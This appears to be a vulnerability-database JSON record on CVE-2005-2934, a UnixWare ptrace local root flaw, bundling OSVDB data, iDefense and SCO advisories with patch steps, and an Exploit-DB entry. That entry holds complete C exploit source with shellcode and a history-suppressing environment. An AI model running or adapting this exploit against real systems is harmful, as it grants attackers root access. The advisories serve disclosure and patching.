{"osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1015676\n[Secunia Advisory ID:18958](https://secuniaresearch.flexerasoftware.com/advisories/18958/)\nOther Advisory URL: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=395\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0622.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0629.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-ptrace.c\n[CVE-2005-2934](https://vulners.com/cve/CVE-2005-2934)\n", "modified": "2006-02-22T04:49:56", "published": "2006-02-22T04:49:56", "href": "https://vulners.com/osvdb/OSVDB:23390", "id": "OSVDB:23390", "title": "UnixWare ptrace() Function Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:23:13", "description": "SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit. CVE-2005-2934. Local exploit for sco platform", "published": "2006-02-26T00:00:00", "type": "exploitdb", "title": "SCO Unixware 7.1.3 - ptrace Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2934"], "modified": "2006-02-26T00:00:00", "id": "EDB-ID:1534", "href": "https://www.exploit-db.com/exploits/1534/", "sourceData": "/* SCO Unixware 7.1.3 ptrace local root exploit\n * ============================================\n * SCO Unixware 7.1.3 kernel allows unprivledged users\n * to debug binaries. 
The condition can be exploited\n * by an attacker when he has execute permissions to \n * a file which has the suid bit set.\n * \n * Example.\n *\n * $ uname -a\n * UnixWare iron 5 7.1.3 i386 x86at SCO UNIX_SVR5\n * $ /linux/bin/bash\n * bash-2.05$ uname -a\n * Linux iron.fi.st 2.4.13 #1 Thu Oct 31 02:32:23 EST 2002 i686 unknown\n * bash-2.05$ id\n * uid=122(matt) gid=1(other) groups=1(other)\n * bash-2.05$ ./fu /unixware/usr/lib/sendmail\n * [ SCO Unixware 7.1.3 ptrace local root exploit\n * [ Using 0xbfffed78\n * sh-2.05# id\n * uid=0(root) gid=1(other) groups=1(other)\n * sh-2.05# \n * \n * - prdelka\n */\n#include <stdio.h>\n#include <stdlib.h>\n#include <signal.h>\n#include <syscall.h>\n#include <sys/ptrace.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n#include <errno.h>\n#include <asm/user.h>\n\n\n\nchar shellcode[]=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\t\t \"\\x90\\x31\\xdb\\x8d\\x43\\x17\\xcd\\x80\\x31\\xc0\"\n\t\t \"\\x50\\x68\"\"//sh\"\"\\x68\"\"/bin\"\"\\x89\\xe3\\x50\"\n\t\t \"\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\n\n\nint main(int argc,char* argv[])\n{\n\tint esp, eip, i = 0;\n\tstruct user_regs_struct regs;\n\tchar *env[] = {\"HISTFILE=/dev/null\",NULL};\n\tpid_t pid;\n\tprintf(\"[ SCO Unixware 7.1.3 local root exploit\\n\");\n\tif(argc < 2)\n\t{\n\t\tprintf(\"[ Usage: [binary]\\n\");\n\t\tprintf(\"[ e.g -rwsr-sr-x root root /linux/opt/kde2/bin/kcheckpass\\n\");\n\t\texit(0);\n\t}\n\tswitch (pid = fork())\n\t{\n\tcase -1:\n\t\tperror(\"fork\");\n\t\tbreak;\n\tcase 0:\t\t\n\t\tptrace(PTRACE_TRACEME, 0, 0, 0);\t\t\n\t\tpid = getpid();\n\t\texecle(argv[1],argv[1],NULL,env);\t\t\n\t\tbreak;\n\tdefault:\t\t\n\t\twaitpid(pid, NULL, 0);\t\n\t\tptrace(PTRACE_GETREGS, pid, NULL, &regs);\n\t\tesp = eip = regs.esp - 512;\n\t\twhile (i < strlen(shellcode)) \n\t\t{\n\t\t\tptrace(PTRACE_POKETEXT, pid, esp, (int) *(int *) (shellcode + i));\n\t\t\ti += 4;\n\t\t\tesp += 4;\n\t\t}\n\t\tregs.eip = (long) 
eip;\n\t\tprintf(\"[ Using 0x%x\\n\",regs.eip);\t\n\t\tptrace(PTRACE_SETREGS, pid, NULL, &regs);\n\t\tptrace(PTRACE_DETACH, pid, NULL,NULL);\n\t}\n\tusleep(1);\n\twait(0);\n\treturn 0;\n}\n\n// milw0rm.com [2006-02-26]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1534/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "description": "SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability\r\n\r\niDefense Security Advisory 02.24.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=395\r\nFebruary 24, 2006\r\n\r\nI. BACKGROUND\r\n\r\nSCO Unixware is a Unix operating system that runs on many OEM platforms.\r\n\r\nMore information about the product is available from:\r\n\r\n http://www.caldera.com/products/unixware714/\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of an access validation error in SCO Unixware allows\r\nattackers to gain root privileges.\r\n\r\nThe vulnerability specifically exists due to a failure to check\r\npermissions on traced executables. The ptrace() system call provides an\r\ninterface for debugging other processes on the system. SCO Unixware's\r\nimplementation of the ptrace system call fails to check for setuid\r\npermissions on binaries before attaching to the process. This results\r\nin the complete control of memory and execution for the traced process\r\nwith root privileges. Attackers can inject data into the running setuid\r\nprocess and execute arbitrary code with root permissions.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability is trivial. Simply placing shellcode\r\nin the environment and changing the instruction pointer via ptrace() is\r\nenough to elevate privileges.\r\n \r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in SCO\r\nUnixware versions 7.1.3 and 7.1.4. 
All previous versions of SCO Unixware\r\nare suspected to be vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nIt is not possible to reduce the impact of this vulnerability other\r\nthan to restrict access to the affected systems.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe vendor has released the following advisory to address this issue:\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-2934 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/15/2005 Initial vendor notification\r\n10/13/2005 Initial vendor response\r\n02/24/2006 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.iDefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.iDefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@iDefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n", "edition": 1, "modified": "2006-02-25T00:00:00", "published": "2006-02-25T00:00:00", "id": "SECURITYVULNS:DOC:11585", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11585", "title": "iDefense Security Advisory 02.24.06: SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n______________________________________________________________________________\r\n\r\n SCO Security Advisory\r\n\r\nSubject: UnixWare 7.1.3 UnixWare 7.1.4 : Setuid ptrace Local Privilege\r\nEscalation Vulnerability\r\nAdvisory number: SCOSA-2006.9\r\nIssue date: 2006 February 21\r\nCross reference: fz533176\r\n CVE-2005-2934\r\n______________________________________________________________________________\r\n\r\n\r\n1. Problem Description\r\n\r\n A local user can exploit the ptrace() system call to gain\r\n root privileges.\r\n \r\n The Common Vulnerabilities and Exposures project\r\n (cve.mitre.org) has assigned the name CVE-2005-2934 to\r\n this issue.\r\n\r\n\r\n2. Vulnerable Supported Versions\r\n\r\n System Binaries\r\n ----------------------------------------------------------------------\r\n UnixWare 7.1.3 /etc/conf/pack.d/sum/Driver_atup.o /etc/conf/pack.d/sum/Driver_mp.o\r\n UnixWare 7.1.4 /etc/conf/pack.d/sum/Driver_atup.o /etc/conf/pack.d/sum/Driver_mp.o\r\n\r\n\r\n\r\n3. Solution\r\n\r\n The proper solution is to install the latest packages.\r\n\r\n\r\n4. 
UnixWare 7.1.3\r\n\r\n 4.1 Location of Fixed Binaries\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9\r\n\r\n\r\n 4.2 Verification\r\n\r\n a31512eee4940c6ba048a1b1878ac4fc p533176.713.image\r\n\r\n md5 is available for download from\r\n ftp://ftp.sco.com/pub/security/tools\r\n\r\n\r\n 4.3 Installing Fixed Binaries\r\n\r\n Upgrade the affected binaries with the following sequence:\r\n\r\n Download p533176.713.image to the /var/spool/pkg directory\r\n\r\n # pkgadd -d /var/spool/pkg/p533176.713.image\r\n\r\n\r\n5. UnixWare 7.1.4\r\n\r\n 5.1 Location of Fixed Binaries\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9\r\n\r\n\r\n 5.2 Verification\r\n\r\n 1b8fa986357036a8be043b642cc47e56 p533176.714.image\r\n\r\n md5 is available for download from\r\n ftp://ftp.sco.com/pub/security/tools\r\n\r\n\r\n 5.3 Installing Fixed Binaries\r\n\r\n Upgrade the affected binaries with the following sequence:\r\n\r\n Download p533176.714.image to the /var/spool/pkg directory\r\n\r\n # pkgadd -d /var/spool/pkg/p533176.714.image\r\n\r\n\r\n6. References\r\n\r\n Specific references for this advisory:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2934\r\n\r\n SCO security resources:\r\n http://www.sco.com/support/security/index.html\r\n\r\n SCO security advisories via email\r\n http://www.sco.com/support/forums/security.html\r\n\r\n This security fix closes SCO incidents fz533176.\r\n\r\n\r\n7. Disclaimer\r\n\r\n SCO is not responsible for the misuse of any of the information\r\n we provide on this website and/or through our security\r\n advisories. Our advisories are a service to our customers intended\r\n to promote secure installation and use of SCO products.\r\n\r\n\r\n8. 
Acknowledgments\r\n\r\n SCO would like to thank iDEFENSE for reporting this vulnerability.\r\n\r\n______________________________________________________________________________\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.0 (UnixWare)\r\n\r\niD8DBQFD+8opaqoBO7ipriERAjDDAJsGF+jQxvdXGodCYyOizM4zWX6kBwCdFlWc\r\n+wSF78NCwxKxa9xx7cU3KMg=\r\n=YZgG\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-02-22T00:00:00", "published": "2006-02-22T00:00:00", "id": "SECURITYVULNS:DOC:11552", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11552", "title": "[Full-disclosure] SCOSA-2006.9 UnixWare 7.1.3 UnixWare 7.1.4 : Setuid ptrace Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}